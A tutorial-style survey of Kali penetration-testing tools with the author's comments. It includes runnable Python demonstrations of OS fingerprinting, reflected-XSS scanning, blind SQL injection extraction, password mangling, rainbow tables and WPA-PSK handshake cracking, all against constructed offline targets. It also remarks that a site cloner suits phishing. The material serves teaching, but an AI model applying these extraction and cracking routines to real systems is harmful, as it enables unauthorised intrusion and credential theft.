Penetration testing means having testers probe a specific network from different vantage points (the internal network, the external network, and so on) in order to discover and dig out the vulnerabilities present in its systems. The outcome is a penetration test report that is handed to the network owner, who can then see clearly which security risks and problems the systems have.
So today I will introduce some commonly used penetration testing tools and how to use them. I recommend collecting them and practising with them gradually.
Each tool below is listed with its category, the kind of interface it has (where that is worth noting), what it does, and my impressions from trying it out.
Information gathering and scanning:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| dmitry | information gathering | | whois lookup / subdomain collection / port scan | The whois output is not straightforward; subdomain and e-mail collection depend on Google; port scanning speed is average |
| dnmap | information gathering | | Builds a distributed nmap: dnmap_server is the server, dnmap_client the client | Not very convenient to use; it works, but it is rarely necessary |
| ike-scan | information gathering | | Collects fingerprint information from IPsec VPN servers over IKE | Seems to be for attacking VPNs; I don't really understand it |
| maltegoce | information gathering | gui | Collects and graphs relationships between domain names, accounts and similar entities | The relationship graphing is really nice, but the results may not be ideal, especially for targets in China |
| netdiscover | information gathering | | Actively sends ARP requests and passively captures ARP traffic | As far as ARP-based host discovery goes, it does the job well |
| nmap | information gathering | cmd-line | Port and service detection, plus script-based vulnerability scanning of open ports | The master of port scanning |
| p0f | information gathering | cmd-line | Monitors the packets sent and received by the network card and reads information such as the remote operating system version out of them | Since it only picks version information out of captured packets, don't expect too much from it |
| recon-ng | information gathering | shell | Information gathering framework modelled on msf | Feels like a command-line version of the usual webmaster-tools sites; nice idea, but not that intuitive to use |
| sparta | brute force | gui | Graphical front-end to hydra with port and service scanning added | OK; a GUI is better than nothing |
| zenmap | information gathering | gui | GUI version of nmap | OK; a GUI is better than nothing |
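To make the p0f entry concrete, here is an added example (not p0f's own code, and not its signature database) of what passive OS fingerprinting actually keys on: the TTL, DF bit, window size and TCP option layout of a client's SYN. The packet builder, the two option layouts and the two-entry signature table are constructed here for illustration; the guesses they produce are only as good as that hand-written table.

```python
import struct

# Option layouts seen in real SYNs (kind, length, value bytes). Constructed samples:
# Linux: MSS, SACK-OK, timestamps, NOP, window scale 7
LINUX_OPTS = bytes.fromhex("020405b4" "0402" "080a0000000100000000" "01" "030307")
# Windows: MSS, NOP, window scale 8, NOP, NOP, SACK-OK
WINDOWS_OPTS = bytes.fromhex("020405b4" "01" "030308" "01" "01" "0402")

def build_syn(ttl, window, options, df=True):
    """Construct an IPv4 header + TCP SYN (no Ethernet header) to feed the parser."""
    tcp_len = 20 + len(options)
    if tcp_len % 4:
        raise ValueError("TCP options must pad to a 4-byte boundary")
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234,
                     0x4000 if df else 0, ttl, 6, 0,
                     bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, (tcp_len // 4) << 4,
                      0x02, window, 0, 0)
    return ip + tcp + options

def parse_syn(pkt):
    """Extract the fields a passive fingerprinter keys on from a raw IPv4/TCP SYN."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6:                      # not TCP
        return None
    df = bool(struct.unpack("!H", pkt[6:8])[0] & 0x4000)
    ttl = pkt[8]
    tcp = pkt[ihl:]
    doff = (tcp[12] >> 4) * 4
    flags = tcp[13]
    if not (flags & 0x02) or (flags & 0x10):
        return None                      # only a pure SYN carries the initial option layout
    window = struct.unpack("!H", tcp[14:16])[0]
    opts = tcp[20:doff]
    names = {2: "mss", 3: "ws", 4: "sok", 8: "ts"}
    order, mss, wscale, i = [], None, None, 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                    # end of option list
            break
        if kind == 1:                    # NOP has no length byte
            order.append("nop"); i += 1; continue
        length = opts[i + 1]
        body = opts[i + 2:i + length]
        if kind == 2:
            mss = struct.unpack("!H", body)[0]
        elif kind == 3:
            wscale = body[0]
        order.append(names.get(kind, "opt%d" % kind))
        i += length
    return {"ttl": ttl, "df": df, "window": window, "mss": mss,
            "wscale": wscale, "options": order}

# Hand-written, illustrative signatures (initial TTL, DF, window rule, option order).
SIGNATURES = [
    {"os": "Linux 3.x+", "ttl": 64, "df": True, "win": ("mss", 20),
     "opts": ["mss", "sok", "ts", "nop", "ws"]},
    {"os": "Windows 7+", "ttl": 128, "df": True, "win": ("fixed", 8192),
     "opts": ["mss", "nop", "ws", "nop", "nop", "sok"]},
]

def guess_os(fp):
    """Match a parsed SYN against the table; observed TTL may be up to 31 hops below the initial value."""
    for sig in SIGNATURES:
        if not (sig["ttl"] - 32 < fp["ttl"] <= sig["ttl"]) or fp["df"] != sig["df"]:
            continue
        kind, val = sig["win"]
        if kind == "mss":
            if fp["mss"] is None or fp["window"] != val * fp["mss"]:
                continue
        elif fp["window"] != val:
            continue
        if fp["options"] == sig["opts"]:
            return sig["os"]
    return None
```

The window rule is the interesting part: Linux advertises its initial window as a multiple of the MSS, while Windows uses a fixed value, which is why the table stores a rule rather than a number. A real tool such as p0f also looks at the IP ID, timestamp behaviour and the layout of later packets, which is where its accuracy beyond this toy comes from.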
Web scanning, proxies and host auditing:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| golismero | web scan | cmd-line | A text-mode web scanner similar to AWVS | Good for understanding how scanners work |
| lynis | system audit | | Feels a bit like the one-click checkup on the 360 security suite's home screen, except that it only scans and raises alerts; there is no one-click fix | Interesting as a piece of shell scripting |
| nikto | web scan | | Web scanner | I like scanners that report vulnerabilities directly (though in practice very few of the findings are usable) |
| unix-privesc-check | system audit | | Audits whether the permissions on key system files are abnormal | Still no summary view and no fix function |
| bed | system scan | | Tests multiple services for buffer overflows by sending assorted fuzzed data | Probably decent |
| burpsuite | web proxy | | The standard web proxy for intercepting and editing requests and responses | Powerful; couldn't ask for more |
| commix | injection detection | | sqlmap detects SQL injection; this tool detects OS command injection | Together the two basically cover injection |
| httrack | website clone | | Clones a website to local disk | May be useful for phishing setups and the like |
| owasp-zap | web proxy | gui | Developed by the OWASP organisation | Compared with burpsuite, interception is weaker and web vulnerability scanning is stronger, but I haven't seen it actually find anything |
| paros | web scan | gui | A web crawling and vulnerability scanning tool | Similar to owasp-zap |
| skipfish | web scan | cmd-line | A fully automated web vulnerability scanner | It crawls the site's pages, analyses them for vulnerabilities, and finally generates an HTML report |
| sqlmap | sql injection scan | cmd-line | A powerful SQL injection scanner | |
| w3af | web scan | shell/gui | A web vulnerability scanning framework | "Framework" means a pile of scanning modules from which you pick some to scan the site; it doesn't feel as good as it sounds |
| webscarab | http proxy | gui | A more specialised tool for analysing a site's tree structure | |
| wpscan | web scan | | Vulnerability scanner for WordPress | |
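The golismero remark says such tools help you understand how a scanner works, and the skipfish entry spells out the loop: crawl, test, report. As an added example (not the code of any of the scanners listed), here is that loop in miniature: a crawler that collects links and forms, a reflection check that injects a marker into every discovered parameter, and an HTML report. The target site is a constructed in-memory fake server with one reflected input and one properly escaped input, so the whole thing runs offline.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, parse_qs, urlencode

SITE = "http://target.example/"   # constructed host name, served by fake_server below

def fake_server(url):
    """Constructed target: a tiny site with one reflected-XSS bug (/search) and one safe page (/safe)."""
    p = urlparse(url)
    q = {k: v[0] for k, v in parse_qs(p.query).items()}
    if p.path == "/":
        return ('<a href="/search">Search</a> <a href="/about.html">About</a> '
                '<a href="/safe?name=x">Safe</a> <a href="http://other.example/">External</a>')
    if p.path == "/about.html":
        return '<p>About us</p><form action="/search" method="get"><input name="q"></form>'
    if p.path == "/search":   # vulnerable: the parameter is written straight back into the page
        return ('<form action="/search" method="get"><input name="q"></form>'
                '<p>Results for %s</p>' % q.get("q", ""))
    if p.path == "/safe":     # fixed: output encoding
        return "<p>Hello %s</p>" % html.escape(q.get("name", ""))
    return "<h1>404</h1>"

class LinkFormParser(HTMLParser):
    """Collect absolute link targets and (action, input names) for every form on a page."""
    def __init__(self, base):
        super().__init__()
        self.base, self.links, self.forms, self._form = base, [], [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base, a["href"]))
        elif tag == "form":
            self._form = {"action": urljoin(self.base, a.get("action", self.base)), "inputs": []}
        elif tag == "input" and self._form is not None and a.get("name"):
            self._form["inputs"].append(a["name"])
    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form); self._form = None

def crawl(start, fetch, limit=50):
    """Breadth-first crawl restricted to the start host; returns {url: parsed page}."""
    host = urlparse(start).netloc
    pages, queue = {}, [start]
    while queue and len(pages) < limit:
        url = queue.pop(0).split("#")[0]
        if url in pages or urlparse(url).netloc != host:
            continue
        parser = LinkFormParser(url)
        parser.feed(fetch(url))
        pages[url] = parser
        queue.extend(parser.links)
    return pages

MARKER = "zxq<'\"pwn"   # contains the characters that must be encoded on output

def find_reflections(pages, fetch):
    """Inject MARKER into every discovered parameter and report where it comes back unencoded."""
    points = set()
    for parser in pages.values():
        for form in parser.forms:
            for name in form["inputs"]:
                points.add((form["action"], name))
        for link in parser.links:
            p = urlparse(link)
            for name in parse_qs(p.query):
                points.add((p._replace(query="").geturl(), name))
    findings = []
    for base, name in sorted(points):
        if MARKER in fetch(base + "?" + urlencode({name: MARKER})):
            findings.append((base, name))
    return findings

def html_report(pages, findings):
    rows = "".join("<li>%s (parameter <code>%s</code>)</li>" % (html.escape(u), html.escape(n))
                   for u, n in findings)
    return ("<h1>Scan report</h1><p>%d pages crawled, %d reflected inputs</p><ul>%s</ul>"
            % (len(pages), len(findings), rows))
```

Even this toy shows why the skipfish-style report is only a starting point: a marker echoed back unencoded is a reflection, not yet a proven exploit, and the /safe page demonstrates the one fix (contextual output encoding) that makes the same input harmless.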
Database tools:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| bbqsql | blind injection | shell | A highly configurable interactive blind SQL injection tool | |
| hexorbase | database management | gui | A client supporting several databases, with password cracking for several of them | Only really usable as a client; to crack passwords you have to bring your own dictionary |
| jsql | database probing | gui | Detects the database type from a URL, runs parameter injection tests, and looks for admin pages and important files | |
| mdb-sql | database management | cmd-line | Connects to Access database files (mdb) so they can be queried with SQL | |
| oscanner | database guessing | cmd-line | Uses a dictionary to check whether an Oracle listener is up and to guess service names | Few parameters. It can test SIDs and default users, but the default dictionary is basically unusable, so you have to write your own |
| sidguesser | database guessing | cmd-line | Uses a dictionary to discover the SIDs present on an Oracle database | Few parameters. Tested: if the SID is in the dictionary, it finds it. Dictionary-based tools still require you to prepare your own dictionary |
| sqlitebrowser | database management | gui | SQLite database client | |
| sqlninja | database guessing | cmd-line | For guessing and attacking MS SQL Server | |
| sqlsus | sql injection detection | cmd-line | Blind injection detection for MySQL | |
| tnscmd10g | database probing | cmd-line | Probes whether an Oracle listener is up and gathers some other information | |
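sqlmap, bbqsql and sqlsus all share one core technique that the entries above only name: boolean-based blind extraction, where the application never returns data from the injected query and the attacker only gets a yes/no signal per request. As an added example (not the code of any of those tools), here is that technique against a constructed SQLite-backed lookup function, with the count of requests it costs and the parameterised version that closes the hole.

```python
import sqlite3

# Constructed target: an in-memory database standing in for a web application
# whose only observable signal is "row found" versus "no row".
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t!')")

QUERIES = []   # every statement the oracle sends, to show the request cost of blind extraction

def vulnerable_lookup(user_id):
    """Vulnerable: the parameter is concatenated into the SQL (what sqlmap and bbqsql exploit)."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None

def safe_lookup(user_id):
    """Fixed: a bound parameter can only ever be a value, never SQL syntax."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone() is not None

def oracle(condition):
    """Boolean oracle: does the page behave as 'found' when the injected condition holds?"""
    QUERIES.append(condition)
    return vulnerable_lookup("1 AND (%s)" % condition)

def extract(expr, max_len=64):
    """Recover the value of a SQL expression one character at a time with a binary search per character."""
    QUERIES.clear()
    length = 0
    for n in range(max_len + 1):                       # 1 request per candidate length
        if oracle("length(%s) = %d" % (expr, n)):
            length = n
            break
    out = ""
    for pos in range(1, length + 1):                   # 7 requests per character (128 = 2**7)
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def query_count():
    return len(QUERIES)
```

A 7-character value therefore costs 8 + 7 * 7 = 57 requests with this naive length probe; the real tools use the same idea but add time-based oracles for when the page gives no boolean signal, and they tune the character range to the target's charset. The fix is not input filtering but parameterisation: `safe_lookup("1 OR 1=1")` simply looks for a user whose id is the literal string.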
|
Wordlist generation:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| cewl | wordlist generation | cmd-line | Crawls a given URL and, within the limits you set, extracts words from the pages to build a password list | The idea is sound, but unfortunately it only extracts the words; there are no smart transformations such as a to @ |
| crunch | wordlist generation | cmd-line | Generates a password list from the constraints you specify (character set, length, pattern) | |
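The cewl remark wishes the tool applied transformations such as a to @ to the words it harvests. As an added example (not cewl's code), here is a small harvester in the same spirit plus the mangling step the remark asks for: case variants, up to two leet substitutions, and common suffixes. The sample HTML is constructed; the substitution map and suffix list are assumptions you would tune to the target.

```python
import re
from html.parser import HTMLParser
from itertools import combinations

LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}   # assumed substitution rules

class TextOnly(HTMLParser):
    """Collect visible text, skipping <script> and <style> contents like a crawler would."""
    def __init__(self):
        super().__init__()
        self.parts, self._skip = [], False
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False
    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)

def extract_words(html_text, min_len=5):
    """cewl-style harvest: alphabetic words of at least min_len letters, deduplicated case-insensitively."""
    p = TextOnly()
    p.feed(html_text)
    seen, out = set(), []
    for w in re.findall(r"[A-Za-z]{%d,}" % min_len, " ".join(p.parts)):
        if w.lower() not in seen:
            seen.add(w.lower())
            out.append(w)
    return out

def leet_variants(word, max_subs=2):
    """All spellings of word with up to max_subs leet substitutions applied."""
    positions = [i for i, c in enumerate(word.lower()) if c in LEET]
    out = {word}
    for n in range(1, min(max_subs, len(positions)) + 1):
        for combo in combinations(positions, n):
            chars = list(word)
            for i in combo:
                chars[i] = LEET[word[i].lower()]
            out.add("".join(chars))
    return out

def mangle(words, suffixes=("", "1", "123", "!", "2021")):
    """Expand harvested words into candidate passwords: case forms x leet variants x suffixes."""
    out = set()
    for w in words:
        for base in (w.lower(), w.capitalize(), w.upper()):
            for v in leet_variants(base):
                for s in suffixes:
                    out.add(v + s)
    return sorted(out)

# Constructed sample page standing in for a crawled target
SAMPLE_HTML = ("<html><head><title>Acme Widgets</title><style>body{color:red}</style></head>"
               "<body><h1>Welcome to Acme Widgets</h1><p>Our founder Bartholomew started in 1998.</p>"
               "<script>var secret='nope';</script></body></html>")
```

Capping the number of substitutions matters: with every position substituted the list explodes and the unlikely spellings crowd out the plausible ones. For real jobs the same effect is obtained by feeding the plain cewl output to john or hashcat with a rule file, which is what the remark is really asking for.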
|
Password and hash cracking:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| hashcat | hash brute force | cmd-line | Brute-force guessing for many hash types; fast and (relatively) light on the CPU, since the work is offloaded to the GPU | |
| john | system password cracking | cmd-line | Cracks system password files (such as /etc/passwd combined with /etc/shadow) to recover the plaintext passwords | |
| johnny | system password cracking | gui | GUI version of john | |
| medusa | password guessing | cmd-line | Online password guessing against IMAP, rlogin, SSH and other services; similar to hydra | |
| ncrack | password guessing | cmd-line | Online password guessing against IMAP, rlogin, SSH and other services; similar to hydra | |
| ophcrack | system password cracking | gui | Rainbow-table based Windows password cracker | |
| pyrit | wifi cracking | cmd-line | Password cracker for WPA/WPA2-encrypted WiFi | |
| rainbowcrack | hash cracking | cmd-line | Generates rainbow tables, sorts them, and uses the sorted tables to crack hashes | |
| rcracki_mt | hash cracking | cmd-line | Multi-threaded rainbow-table based hash cracker; possibly part of rainbowcrack | |
| wordlists | wordlists | cmd-line | Prints where the wordlists bundled with Kali are stored | |
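rainbowcrack, rcracki_mt and ophcrack all rest on the same construction, which the entries only name: chains of hash-then-reduce steps, of which only the end points are stored. Here is an added worked example (not the code of any of those tools) of the three operations the rainbowcrack description lists: generating chains, indexing them by end point, and looking up a hash. The keyspace (three lowercase letters), hash (MD5) and chain parameters are toy choices so that it runs in well under a second.

```python
import hashlib
import string
from itertools import product

ALPHABET = string.ascii_lowercase
PW_LEN = 3
KEYSPACE = len(ALPHABET) ** PW_LEN          # 17576 possible passwords
CHAIN_LEN = 40

def H(pw):
    return hashlib.md5(pw.encode()).digest()

def reduce_(digest, step):
    """Map a digest back into the keyspace. Mixing the step index in is what makes
    the table 'rainbow': two chains that collide at different steps do not merge."""
    n = (int.from_bytes(digest[:8], "big") + step) % KEYSPACE
    out = []
    for _ in range(PW_LEN):
        out.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(out)

def password_at(start, k):
    """k-th password in the chain beginning at start (k = 0 is start itself)."""
    pw = start
    for step in range(k):
        pw = reduce_(H(pw), step)
    return pw

def build_table(starts, length):
    """Generate the chains and index them by end point; only (end, start) pairs are kept."""
    table = {}
    for s in starts:
        table.setdefault(password_at(s, length), []).append(s)
    return table

def lookup(table, digest, length):
    """Assume the digest sits at each possible chain position in turn, walk to the chain
    end, and verify every candidate chain by regenerating it (end points can collide)."""
    for pos in range(length):
        pw = reduce_(digest, pos)
        for step in range(pos + 1, length):
            pw = reduce_(H(pw), step)
        for start in table.get(pw, []):
            cand = start
            for step in range(length):
                if H(cand) == digest:
                    return cand
                cand = reduce_(H(cand), step)
    return None

def coverage(table, length):
    """Fraction of the keyspace that actually appears in some chain (always below 100%)."""
    seen = set()
    for starts in table.values():
        for s in starts:
            pw = s
            for step in range(length):
                seen.add(pw)
                pw = reduce_(H(pw), step)
    return len(seen) / KEYSPACE

# Every 50th password as a chain start: 352 chains of length 40 = about 14k hashes of work,
# stored as 352 (end, start) pairs instead of a 17576-entry lookup table.
STARTS = ["".join(p) for p in product(ALPHABET, repeat=PW_LEN)][::50]
TABLE = build_table(STARTS, CHAIN_LEN)
```

The coverage function is the honest part of the story: chains merge and cover the same passwords twice, so a table of this size never reaches the full keyspace, which is why real tables are generated in multiple parts with different reduction seeds. It is also why a salt defeats the whole approach: each salt value would need its own table.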
|
Wireless:

| Tool | Category | Interface | Description | Remark |
|---|---|---|---|---|
| aircrack-ng | wifi cracking | cmd-line | Suite for cracking WEP- and WPA-encrypted WiFi | |
| chirp | radio | gui | Programming software for amateur radio handsets (reads and writes channel memories); not a packet interception tool | Not a WiFi or packet-capture tool, despite appearing in this section |
| cowpatty | wifi cracking | cmd-line | Guesses WPA-PSK passphrases from a captured four-way handshake and a dictionary | It cannot capture packets itself and only handles WPA-PSK, so the functionality is somewhat limited |
| Fern WIFI Cracker | wifi cracking | gui | Dictionary-based WEP and WPA cracker | Discovers networks and captures packets automatically; graphical, simple and easy to use |
| Ghost Phisher | rogue AP | gui | Discovers APs, disconnects the devices attached to them, then impersonates the AP so the devices reconnect to it | Besides the fake AP, the GUI also offers fake DNS and HTTP servers; fairly easy to use |
| giskismet | visualisation | gui | Visualises Kismet output, i.e. converts it to text, HTML and other formats | |
| kismet | AP discovery | shell | Interactive AP discovery tool that lists all sorts of information about nearby APs | |
| MDK3 | AP disruption | cmd-line | Floods an AP with connect and disconnect requests, and advertises huge numbers of non-existent APs to nearby devices | The attack methods in this tool are simply insane |
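cowpatty, pyrit and aircrack-ng all crack WPA-PSK the same way, which the entries above do not spell out: derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK with the two MACs and two nonces from the captured handshake, and check whether the resulting KCK reproduces the MIC on the captured EAPOL frame. As an added example (not the code of any of those tools), here is that pipeline end to end; the "capture" is constructed in make_capture from a known passphrase so the cracker can be exercised offline. The MAC addresses, nonces and SSID are assumed values.

```python
import hashlib
import hmac

def pmk(passphrase, ssid):
    """802.11i PSK derivation: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit key (the expensive step)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]

def ptk(pmk_, ap_mac, sta_mac, anonce, snonce):
    """Pairwise transient key; the first 16 bytes are the KCK used to MIC the handshake frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac) +
            min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16].
    The MIC field sits at bytes 81..96 of the EAPOL frame (4-byte 802.1X header + key descriptor)."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def crack(handshake, wordlist):
    """Dictionary attack: one PBKDF2 per candidate, then a cheap PRF and HMAC to test the MIC."""
    for cand in wordlist:
        k = ptk(pmk(cand, handshake["ssid"]), handshake["ap_mac"], handshake["sta_mac"],
                handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(k[:16], handshake["eapol"]), handshake["mic"]):
            return cand
    return None

def make_capture(passphrase, ssid="TestNet"):
    """Constructed stand-in for handshake message 2 as airodump-ng would have saved it."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # assumed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                          # assumed
    frame = bytearray(99)                 # 4-byte 802.1X header + 95-byte key descriptor, no key data
    frame[0:4] = b"\x01\x03\x00\x5f"      # version 1, type 3 (EAPOL-Key), body length 95
    frame[4] = 2                          # RSN key descriptor
    frame[5:7] = b"\x01\x0a"              # key info: MIC set, pairwise, descriptor version 2
    frame[7:9] = b"\x00\x10"              # key length 16 (CCMP)
    frame[16] = 1                         # replay counter 1
    frame[17:49] = snonce
    kck = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame[81:97] = eapol_mic(kck, bytes(frame))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": bytes(frame), "mic": bytes(frame[81:97])}
```

Two practical points fall out of the code. The cost is entirely in pmk(): 4096 HMAC-SHA1 rounds per candidate, which is why pyrit and hashcat push that step to the GPU and why the PMK depends on the SSID, so precomputed tables only work for one network name. And the MIC check needs both MACs, both nonces and the MIC'd frame, which is exactly why the cowpatty remark complains that it cannot capture: without a complete handshake there is nothing to verify a guess against.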